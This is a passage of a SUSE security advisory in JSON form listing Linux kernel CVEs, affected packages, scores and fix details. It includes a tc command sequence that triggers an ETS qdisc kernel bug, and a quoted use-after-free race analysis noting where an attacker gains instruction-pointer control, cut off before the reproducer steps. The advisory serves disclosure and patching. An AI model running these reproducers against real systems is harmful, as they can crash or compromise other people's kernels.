"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68814",
"url": "https://www.suse.com/security/cve/CVE-2025-68814"
},
{
"category": "external",
"summary": "SUSE Bug 1256651 for CVE-2025-68814",
"url": "https://bugzilla.suse.com/1256651"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68814"
},
{
"cve": "CVE-2025-68815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68815"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Remove drr class from the active list if it changes to strict\n\nWhenever a user issues an ets qdisc change command, transforming a\ndrr class into a strict one, the ets code isn\u0027t checking whether that\nclass was in the active list and removing it. This means that, if a\nuser changes a strict class (which was in the active list) back to a drr\none, that class will be added twice to the active list [1].\n\nDoing so with the following commands:\n\ntc qdisc add dev lo root handle 1: ets bands 2 strict 1\ntc qdisc add dev lo parent 1:2 handle 20: \\\n tbf rate 8bit burst 100b latency 1s\ntc filter add dev lo parent 1: basic classid 1:2\nping -c1 -W0.01 -s 56 127.0.0.1\ntc qdisc change dev lo root handle 1: ets bands 2 strict 2\ntc qdisc change dev lo root handle 1: ets bands 2 strict 1\nping -c1 -W0.01 -s 56 127.0.0.1\n\nWill trigger the following splat with list debug turned on:\n\n[ 59.279014][ T365] ------------[ cut here ]------------\n[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.\n[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220\n[ 59.280860][ T365] Modules linked in:\n[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)\n[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220\n[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 \u003c0f\u003e 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44\n...\n[ 59.288812][ T365] Call Trace:\n[ 59.289056][ T365] \u003cTASK\u003e\n[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80\n[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0\n[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10\n[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240\n[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10\n[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110\n[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0\n\nFix this by always checking and removing an ets class from the active list\nwhen changing it to strict.\n\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68815",
"url": "https://www.suse.com/security/cve/CVE-2025-68815"
},
{
"category": "external",
"summary": "SUSE Bug 1256680 for CVE-2025-68815",
"url": "https://bugzilla.suse.com/1256680"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68815"
},
{
"cve": "CVE-2025-68816",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68816"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fw_tracer, Validate format string parameters\n\nAdd validation for format string parameters in the firmware tracer to\nprevent potential security vulnerabilities and crashes from malformed\nformat strings received from firmware.\n\nThe firmware tracer receives format strings from the device firmware and\nuses them to format trace messages. Without proper validation, bad\nfirmware could provide format strings with invalid format specifiers\n(e.g., %s, %p, %n) that could lead to crashes, or other undefined\nbehavior.\n\nAdd mlx5_tracer_validate_params() to validate that all format specifiers\nin trace strings are limited to safe integer/hex formats (%x, %d, %i,\n%u, %llx, %lx, etc.). Reject strings containing other format types that\ncould be used to access arbitrary memory or cause crashes.\nInvalid format strings are added to the trace output for visibility with\n\"BAD_FORMAT: \" prefix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68816",
"url": "https://www.suse.com/security/cve/CVE-2025-68816"
},
{
"category": "external",
"summary": "SUSE Bug 1256674 for CVE-2025-68816",
"url": "https://bugzilla.suse.com/1256674"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68816"
},
{
"cve": "CVE-2025-68819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68819"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()\n\nrlen value is a user-controlled value, but dtv5100_i2c_msg() does not\ncheck the size of the rlen value. Therefore, if it is set to a value\nlarger than sizeof(st-\u003edata), an out-of-bounds vuln occurs for st-\u003edata.\n\nTherefore, we need to add proper range checking to prevent this vuln.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68819",
"url": "https://www.suse.com/security/cve/CVE-2025-68819"
},
{
"category": "external",
"summary": "SUSE Bug 1256664 for CVE-2025-68819",
"url": "https://bugzilla.suse.com/1256664"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68819"
},
{
"cve": "CVE-2025-68820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68820"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: xattr: fix null pointer deref in ext4_raw_inode()\n\nIf ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),\niloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()\nlacks error checking, this will lead to a null pointer dereference\nin ext4_raw_inode(), called right after ext4_get_inode_loc().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68820",
"url": "https://www.suse.com/security/cve/CVE-2025-68820"
},
{
"category": "external",
"summary": "SUSE Bug 1256754 for CVE-2025-68820",
"url": "https://bugzilla.suse.com/1256754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68820"
},
{
"cve": "CVE-2025-71064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71064",
"url": "https://www.suse.com/security/cve/CVE-2025-71064"
},
{
"category": "external",
"summary": "SUSE Bug 1256654 for CVE-2025-71064",
"url": "https://bugzilla.suse.com/1256654"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71064"
},
{
"cve": "CVE-2025-71066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what 